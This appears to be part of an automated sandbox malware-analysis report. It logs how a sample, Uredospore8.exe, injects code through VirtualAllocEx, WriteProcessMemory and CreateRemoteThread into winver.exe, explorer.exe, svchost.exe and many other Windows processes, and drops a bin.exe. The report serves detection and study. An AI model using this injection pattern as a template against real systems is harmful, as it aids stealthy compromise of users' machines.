    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 13E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1450000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E90000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: CB0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B60000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B90000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1320000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: DB0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 7F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2500000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2100000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 12E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1480000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E60000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1420000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E90000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: ED0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 29A0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2C30000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: D30000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E20000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 6A0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1370000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 23B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 810000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2980000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1360000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 750000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 590000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 9D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 5F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe base: 2140000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D0E45 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,2_2_006D0E45
    Source: C:\Windows\SysWOW64\winver.exeCode function: 3_2_00D40E21 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,3_2_00D40E21
    Source: C:\Windows\explorer.exeCode function: 4_2_00F81FD7 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,4_2_00F81FD7
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_001C0E21 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,19_2_001C0E21
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_001C0E21 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,30_2_001C0E21
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_02140E21 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,30_2_02140E21
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 34_2_001D0E21 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,34_2_001D0E21
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 34_2_008B0E45 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,34_2_008B0E45
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: F808E2Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\sihost.exe EIP: D0094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: F0094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 19094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ctfmon.exe EIP: 9E094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 2DF094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 84094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe EIP: EE094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: A4094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe EIP: BB094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 53094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 82094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\smartscreen.exe EIP: 25094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ApplicationFrameHost.exe EIP: 93094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe EIP: 98094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 18094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 67094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe EIP: 9C094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\conhost.exe EIP: F7094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\backgroundTaskHost.exe EIP: 71094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: D5094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 11A094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 234094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: D6094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: E1094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 214094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 73094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: B1094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 268094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 255094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 213094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2BA094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2B2094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 11D094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B8094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 137094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2ED094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 212094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 28D094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 22B094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 293094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 25B094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2D1094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 292094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 248094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 218094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2D6094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 14D094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 26B094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 138094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 284094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B3094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 69094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 23B094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2F1094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 22B094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 221094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: C1094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F9094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 62094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 86094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 7A094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 127094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 69094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: BD094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 5F094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 92094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 10C094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 98094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 200094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A2094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 10F094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 13E094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 145094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E9094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: CB094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B6094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2B9094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 132094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: DB094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 7F094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 250094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 210094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 12E094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 148094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E6094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 142094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E9094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: ED094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 29A094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2C3094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2B8094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: D3094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 11E094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E2094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 6A094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 137094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 23B094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 81094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 298094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 136094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 75094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B8094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 59094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 9D094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\dllhost.exe EIP: 5F094CJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe EIP: 214094CJump to behavior
    Source: C:\Windows\explorer.exeThread created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe EIP: 1C094CJump to behavior
    Source: C:\Windows\explorer.exeThread created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe EIP: 1C094CJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeThread created: unknown EIP: 76228920Jump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeThread created: unknown EIP: 1D094CJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtOpenSection: Direct from: 0x2143F49Jump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtDelayExecution: Direct from: 0x2144046Jump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtDelayExecution: Direct from: 0x2144036Jump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeNtDelayExecution: Direct from: 0x2144026Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: PID: 4004 base: F80000 value: 50Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: PID: 4004 base: 2DF0000 value: 50Jump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeMemory written: C:\Windows\SysWOW64\winver.exe base: FF18B0Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\explorer.exe base: F80000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\sihost.exe base: D00000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: F00000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 190000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\ctfmon.exe base: 9E0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\explorer.exe base: 2DF0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 840000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: EE0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A40000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: BB0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 530000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 820000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\smartscreen.exe base: 250000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 930000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 980000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 180000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 670000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 9C0000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\conhost.exe base: F70000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 710000Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: D50000Jump to behavior
